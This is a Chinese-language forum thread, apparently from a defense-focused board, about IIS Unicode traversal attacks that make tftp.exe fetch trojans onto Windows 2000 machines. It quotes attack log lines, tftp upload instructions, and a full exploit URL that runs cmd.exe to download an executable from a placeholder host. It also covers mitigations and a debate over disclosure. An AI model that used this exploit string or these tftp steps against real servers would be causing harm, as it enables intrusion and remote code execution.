奇怪的tftp.exe

[yc123]

這兩天我的防火牆(Norton)老是出現警告tftp.exe要連出去的警告，
有時我試著將它放行，結果它傳了一些TFTP*的檔案到C:\Inetpub\Scripts的目錄下，
有些有毒，有些無毒，有人遇過或知道這樣的問題嗎?
據我所知，駭客利用TFTP，可以直接上傳文件而不需經過任何帳號及密碼認證，如果是真的豈不是太危險了!!!
我的作業系統為:Windows 2000 Pro SP2

[Scorpion]

我前天 9/18 晚上 10 點開始也與你有同樣的遭遇，Zone Alarm Pro 一直在擋
TFTP.EXE 向外連出，連出的 IP 大約三、四個一直重複，把網路斷線或用 ZA
暫時中斷網路連接，再重新連線，那些 IP 又換了，我用的是 Hinet ADSL，
TFTP 要連出去的都是 61.xxx.xxx.xxx 的 IP，而且開啟「工作管理員」還會看到
有 CMD.EXE 這個 command shell 在執行，我看不到任何 DOS 視窗，不過只要
不讓 TFTP 連出去，這兩個程式的執行程序會自動結束，但是會重新一直連！


查 logfile 有很多這樣的記錄：
09:34:09 61.253.5.73 GET /scripts/..%5c../winnt/system32/cmd.exe 404


查了一整個晚上的資料，發現這個就是利用 IIS Unicode 漏洞找 cmd.exe 來執行。


logfile 還有少數這樣的記錄：


09:31:58 61.79.66.62 GET /_vti_bin/..%5c../..%5c../..%5c../Admin.dll 500


到昨天早上終於看到新病毒 Nimda 的報告出現，其中被感染的一項特徵就是 Admin.dll
這個檔案，不過所有被 Nimda 感染的特徵我都找不到，應該是還沒被感染吧？！


TFTP 可能就是要連出去取得木馬或病毒檔再進行下一步的動作！


你還真的讓 TFTP 連出去取得那些檔案，我想請問一下它傳了哪些檔案給你，能否告知
檔案名稱？謝謝！


建議：先暫時把 scripts 這個目錄的 web 共享關掉，wwwroot 裡面的 _private
_vti_cnf 之類的目錄如果有 web 共享也一起關掉，讓它沒有辦法利用 Unidcode
漏洞到你 c:\ 根目錄底下執行程式。


PS.我也是 Win2000 PRO SP2 有裝 IIS

[rs125]

搜尋看看是否有*.ftp的檔案存在...
並檢查其內容有無可疑處...

[塵緣]

最初由 yc123
這兩天我的防火牆(Norton)老是出現警告tftp.exe要連出去的警告，
有時我試著將它放行，結果它傳了一些TFTP*的檔案到C:\Inetpub\Scripts的目錄下，
有些有毒，有些無毒，有人遇過或知道這樣的問題嗎?
據我所知，駭客利用TFTP，可以直接上傳文件而不需經過任何帳號及密碼認證，如果是真的豈不是太危險了!!!
我的作業系統為:Windows 2000 Pro SP2

你不知道嗎?????我只要透過 ie 就可以 利用 TFTP 任意的上傳任何木馬 到你的電腦
(當然你的電腦要有可用的漏洞)，然後在你的電腦上運行..............
所以，依照你上面所說 的，你的TFTP 自己 下載嚕 檔案回來
我覺得 是你被入侵嚕 查察你的LOG檔 或是你防火牆所欄到的訊息吧


一、上傳﹕
格式﹕tftp -i 現在你的IP get 源文件夾 盤符﹕\\路徑\\目標文件名
二、下載﹕
格式﹕tftp -i 對方的IP put 盤符﹕\路徑\源文件名

用法和注意點﹕
1、tftp必須在本機上先運行起來，充當虛擬服務器的角色。
2、tftp在運行中不得斷開連接。
3、要上傳的文件必須和tftp在一個目錄中。
4、文件的默認下載位置就是tftp目錄。
5、tftp在上傳的格式中，目標地址要用雙\\格開。
6、可以在任何對方的命令行使用tftp，如﹕跟在對方IP後的瀏覽器地址欄裡（詳細說明請參考U漏洞的貼子）、SQLEXEC的command輸入行等等位置。
7、tftp默認屬性是上傳和下載的時候采用覆蓋不提示的方式。
8、tftp上傳的文件可能會加上只讀屬性，請上傳完全畢後檢閱！

[yc123]

我大概已知道是怎回事了，
原來是利用IIS Unicode的漏洞，而使用tftp這支程式來上傳文件，
語法大概如下:
http://x.x.x.x/scripts/..%c0%af../wi...md.exe?/c+tftp -i x.x.x.x GET target.exe c:\\inetpub\\scripts\\source.exe
(這語法是抄來的，我也不知是否正確)，而且必需在本機跑一支ftpd32.exe(類似FTP伺服器，用來讓tftp來抓取要上傳的檔案)。
　
目前我的解決方法為1.在Web堨[裝了URLscan;2.暫將tftp.exe阻絶(今天再試試看URLscan有無作用)。
　
微軟修正Unicode文章:
http://www.microsoft.com/windows2000...62/default.asp

[塵緣]

最初由 yc123
[
微軟修正Unicode文章:
http://www.microsoft.com/windows2000...62/default.asp [/B]

這位哥哥 我就是這個意思
不過
語法 改一下啦 別說太清楚 這是防駭版 不是 駭客版喔
ㄎㄎㄎㄎ

另外 只需要在自己的電腦上 跑 tftp 對方的根本不需要喔

[Ares]

其實若沒架站,拜託別用IIS了,我也在這裡講了不知道多少次了 ^^!
現在隨便找一堆個人用戶就可以用IIS漏洞進到C;\底下,屢試不爽.
個人用戶其實不需要W2000 server的(預設安裝IIS).
這麼喜歡2000乾脆就用Perfessional就好了,為什麼有一堆人這麼愛W2000server呢?

[yc123]

最初由 塵緣

語法 改一下啦 別說太清楚 這是防駭版 不是 駭客版喔

個人不覺得有更改的必要。就如同我們瞭解犯罪行兇的惡徒一樣，我們瞭解其犯案的手法和細節，然而並不使用它來犯罪，而是為了避開或阻擋一些已知的危險。
　
當然每個人的看法有所不同，但個人覺得公佈出來只是為了提醒大家有這樣真實的事，然後能提早防範。

[塵緣]

最初由 yc123


個人不覺得有更改的必要。就如同我們瞭解犯罪行兇的惡徒一樣，我們瞭解其犯案的手法和細節，然而並不使用它來犯罪，而是為了避開或阻擋一些已知的危險。
　
當然每個人的看法有所不同，但個人覺得公佈出來只是為了提醒大家有這樣真實的事，然後能提早防範。

是 您說的對 當然你有您的權利 沒人可管你
就如同 社會上的殺人案件 記者很詳細的報導 也是為了 讓大家知道如何防範
就算有人模仿 也不能怪媒體
前一陣子 的 12歲少年 殺奶奶的事件 也是模仿柯南 唉..........

我只是 好心提醒你一下 可以稍微 做一下遮掩 知道的就會回你嚕
算了 算我雞婆好嚕